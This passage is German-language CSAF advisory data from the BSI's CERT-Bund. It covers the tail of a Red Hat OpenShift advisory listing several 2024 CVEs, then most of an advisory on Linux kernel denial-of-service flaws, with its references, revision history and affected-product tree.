"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-2961"
},
{
"cve": "CVE-2024-33599",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-33599"
},
{
"cve": "CVE-2024-33600",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-33600"
},
{
"cve": "CVE-2024-33601",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-33601"
},
{
"cve": "CVE-2024-33602",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-33602"
}
]
}
wid-sec-w-2022-1664
Vulnerability from csaf_certbund
Published
2022-10-10 22:00
Modified
2024-11-19 23:00
Summary
Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Der Kernel stellt den Kern des Linux Betriebssystems dar.
Angriff
Ein lokaler Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen, um einen Denial of Service Angriff durchzuführen.
Betroffene Betriebssysteme
- Linux
- UNIX
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Der Kernel stellt den Kern des Linux Betriebssystems dar.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein lokaler Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2022-1664 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-1664.json"
},
{
"category": "self",
"summary": "WID-SEC-2022-1664 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1664"
},
{
"category": "external",
"summary": "Red Hat Bugzilla - Bug 2133451 vom 2022-10-10",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133451"
},
{
"category": "external",
"summary": "Red Hat Bugzilla - Bug 2133452 vom 2022-10-10",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1306 vom 2024-03-13",
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:0461 vom 2024-01-25",
"url": "https://access.redhat.com/errata/RHSA-2024:0461"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0747-1 vom 2023-03-15",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014045.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0749-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014062.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0779-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014076.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0780-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014075.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0778-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014073.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0768-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014072.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0770-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014071.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0762-1 vom 2023-03-16",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014066.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0796-1 vom 2023-03-17",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014087.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0852-1 vom 2023-03-21",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014114.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:1609-1 vom 2023-03-28",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014197.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:1608-1 vom 2023-03-28",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014202.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:1710-1 vom 2023-03-31",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014289.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0767-1 vom 2023-04-03",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-April/014345.html"
},
{
"category": "external",
"summary": "DELL Security Update",
"url": "https://www.dell.com/support/kbdoc/de-de/000221476/dsa-2024-058-security-update-for-dell-networker-vproxy-multiple-components-vulnerabilities"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0774-1 vom 2024-02-27",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-February/018013.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0749-2 vom 2023-06-06",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-June/015093.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:0796-2 vom 2023-06-06",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-June/015092.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:2646-1 vom 2024-02-27",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-February/018025.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1250 vom 2024-03-12",
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:2809-1 vom 2023-07-11",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-July/015470.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:2871-1 vom 2023-07-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-July/015524.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1019 vom 2024-02-28",
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1018 vom 2024-02-28",
"url": "https://access.redhat.com/errata/RHSA-2024:1018"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3601-1 vom 2023-09-14",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016153.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:0930 vom 2024-02-21",
"url": "https://access.redhat.com/errata/RHSA-2024:0930"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3681-1 vom 2023-09-19",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016214.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3684-1 vom 2023-09-19",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016211.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3680-1 vom 2023-09-19",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016208.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3687-1 vom 2023-09-19",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016222.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3705-1 vom 2023-09-20",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016233.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-0461 vom 2024-03-07",
"url": "https://linux.oracle.com/errata/ELSA-2024-0461.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2023:3785-1 vom 2023-09-26",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2023-September/016326.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1268 vom 2024-03-12",
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1269 vom 2024-03-12",
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1367 vom 2024-03-19",
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1382 vom 2024-03-19",
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1404 vom 2024-03-19",
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7144861 vom 2024-03-20",
"url": "https://www.ibm.com/support/pages/node/7144861"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1607 vom 2024-04-02",
"url": "https://access.redhat.com/errata/RHSA-2024:1607"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:1614 vom 2024-04-02",
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2024:1607 vom 2024-04-05",
"url": "https://errata.build.resf.org/RLSA-2024:1607"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2024:1614 vom 2024-04-05",
"url": "https://errata.build.resf.org/RLSA-2024:1614"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2024-1607 vom 2024-04-11",
"url": "https://linux.oracle.com/errata/ELSA-2024-1607.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2394 vom 2024-04-30",
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:2093 vom 2024-05-01",
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RXSA-2024:1607 vom 2024-05-06",
"url": "https://errata.build.resf.org/RXSA-2024:1607"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6817-1 vom 2024-06-08",
"url": "https://ubuntu.com/security/notices/USN-6817-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6816-1 vom 2024-06-08",
"url": "https://ubuntu.com/security/notices/USN-6816-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6817-2 vom 2024-06-11",
"url": "https://ubuntu.com/security/notices/USN-6817-2"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6817-3 vom 2024-06-14",
"url": "https://ubuntu.com/security/notices/USN-6817-3"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-3842 vom 2024-06-25",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6878-1 vom 2024-07-04",
"url": "https://ubuntu.com/security/notices/USN-6878-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6898-1 vom 2024-07-15",
"url": "https://ubuntu.com/security/notices/USN-6898-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6898-2 vom 2024-07-17",
"url": "https://ubuntu.com/security/notices/USN-6898-2"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6898-3 vom 2024-07-19",
"url": "https://ubuntu.com/security/notices/USN-6898-3"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6898-4 vom 2024-07-23",
"url": "https://ubuntu.com/security/notices/USN-6898-4"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4831 vom 2024-07-24",
"url": "https://access.redhat.com/errata/RHSA-2024:4831"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:4823 vom 2024-07-24",
"url": "https://access.redhat.com/errata/RHSA-2024:4823"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6919-1 vom 2024-07-26",
"url": "https://ubuntu.com/security/notices/USN-6919-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6917-1 vom 2024-07-26",
"url": "https://ubuntu.com/security/notices/USN-6917-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-6927-1 vom 2024-07-30",
"url": "https://ubuntu.com/security/notices/USN-6927-1"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7161954 vom 2024-07-30",
"url": "https://www.ibm.com/support/pages/node/7161954"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7019-1 vom 2024-09-18",
"url": "https://ubuntu.com/security/notices/USN-7019-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7088-1 vom 2024-10-31",
"url": "https://ubuntu.com/security/notices/USN-7088-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7088-2 vom 2024-11-04",
"url": "https://ubuntu.com/security/notices/USN-7088-2"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7088-3 vom 2024-11-06",
"url": "https://ubuntu.com/security/notices/USN-7088-3"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7088-5 vom 2024-11-14",
"url": "https://ubuntu.com/security/notices/USN-7088-5"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7119-1 vom 2024-11-20",
"url": "https://ubuntu.com/security/notices/USN-7119-1"
}
],
"source_lang": "en-US",
"title": "Linux Kernel: Mehrere Schwachstellen erm\u00f6glichen Denial of Service",
"tracking": {
"current_release_date": "2024-11-19T23:00:00.000+00:00",
"generator": {
"date": "2024-11-20T09:29:12.835+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.8"
}
},
"id": "WID-SEC-W-2022-1664",
"initial_release_date": "2022-10-10T22:00:00.000+00:00",
"revision_history": [
{
"date": "2022-10-10T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2023-03-15T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-03-16T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-03-19T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-03-21T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-03-27T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-04-02T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-04-03T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-06-06T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-07-11T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-07-18T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-09-14T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-09-19T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-09-20T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2023-09-26T22:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2024-01-25T23:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-01-28T23:00:00.000+00:00",
"number": "17",
"summary": "Neue Updates von Dell aufgenommen"
},
{
"date": "2024-02-20T23:00:00.000+00:00",
"number": "18",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-02-26T23:00:00.000+00:00",
"number": "19",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2024-02-27T23:00:00.000+00:00",
"number": "20",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2024-02-28T23:00:00.000+00:00",
"number": "21",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-07T23:00:00.000+00:00",
"number": "22",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-03-11T23:00:00.000+00:00",
"number": "23",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-12T23:00:00.000+00:00",
"number": "24",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-13T23:00:00.000+00:00",
"number": "25",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-18T23:00:00.000+00:00",
"number": "26",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-19T23:00:00.000+00:00",
"number": "27",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-03-20T23:00:00.000+00:00",
"number": "28",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2024-04-02T22:00:00.000+00:00",
"number": "29",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-04-07T22:00:00.000+00:00",
"number": "30",
"summary": "Neue Updates von Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2024-04-11T22:00:00.000+00:00",
"number": "31",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2024-04-29T22:00:00.000+00:00",
"number": "32",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-01T22:00:00.000+00:00",
"number": "33",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-05-06T22:00:00.000+00:00",
"number": "34",
"summary": "Neue Updates von Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2024-06-09T22:00:00.000+00:00",
"number": "35",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-06-11T22:00:00.000+00:00",
"number": "36",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-06-16T22:00:00.000+00:00",
"number": "37",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-06-25T22:00:00.000+00:00",
"number": "38",
"summary": "Neue Updates von Debian aufgenommen"
},
{
"date": "2024-07-04T22:00:00.000+00:00",
"number": "39",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-07-15T22:00:00.000+00:00",
"number": "40",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-07-17T22:00:00.000+00:00",
"number": "41",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-07-18T22:00:00.000+00:00",
"number": "42",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-07-22T22:00:00.000+00:00",
"number": "43",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-07-24T22:00:00.000+00:00",
"number": "44",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-07-28T22:00:00.000+00:00",
"number": "45",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-07-30T22:00:00.000+00:00",
"number": "46",
"summary": "Neue Updates von Ubuntu und IBM aufgenommen"
},
{
"date": "2024-09-17T22:00:00.000+00:00",
"number": "47",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-10-31T23:00:00.000+00:00",
"number": "48",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-11-04T23:00:00.000+00:00",
"number": "49",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-11-05T23:00:00.000+00:00",
"number": "50",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-11-14T23:00:00.000+00:00",
"number": "51",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2024-11-19T23:00:00.000+00:00",
"number": "52",
"summary": "Neue Updates von Ubuntu aufgenommen"
}
],
"status": "final",
"version": "52"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vProxy\u003c19.9.0.4",
"product": {
"name": "Dell NetWorker vProxy\u003c19.9.0.4",
"product_id": "T032377"
}
},
{
"category": "product_version",
"name": "vProxy19.9.0.4",
"product": {
"name": "Dell NetWorker vProxy19.9.0.4",
"product_id": "T032377-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:dell:networker:vproxy_19.9.0.4"
}
}
},
{
"category": "product_version_range",
"name": "vProxy\u003c19.10",
"product": {
"name": "Dell NetWorker vProxy\u003c19.10",
"product_id": "T032378"
}
},
{
"category": "product_version",
"name": "vProxy19.10",
"product": {
"name": "Dell NetWorker vProxy19.10",
"product_id": "T032378-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:dell:networker:vproxy_19.10"
}
}
}
],
"category": "product_name",
"name": "NetWorker"
}
],
"category": "vendor",
"name": "Dell"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "Plus 10.1",
"product": {
"name": "IBM Spectrum Protect Plus 10.1",
"product_id": "T015895",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:spectrum_protect:plus_10.1"
}
}
}
],
"category": "product_name",
"name": "Spectrum Protect"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c10.1.16.2",
"product": {
"name": "IBM Spectrum Protect Plus \u003c10.1.16.2",
"product_id": "T036379"
}
},
{
"category": "product_version",
"name": "10.1.16.2",
"product": {
"name": "IBM Spectrum Protect Plus 10.1.16.2",
"product_id": "T036379-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:spectrum_protect_plus:10.1.16.2"
}
}
}
],
"category": "product_name",
"name": "Spectrum Protect Plus"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Open Source Linux Kernel",
"product": {
"name": "Open Source Linux Kernel",
"product_id": "6368",
"product_identification_helper": {
"cpe": "cpe:/o:linux:linux_kernel:-"
}
}
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-36402",
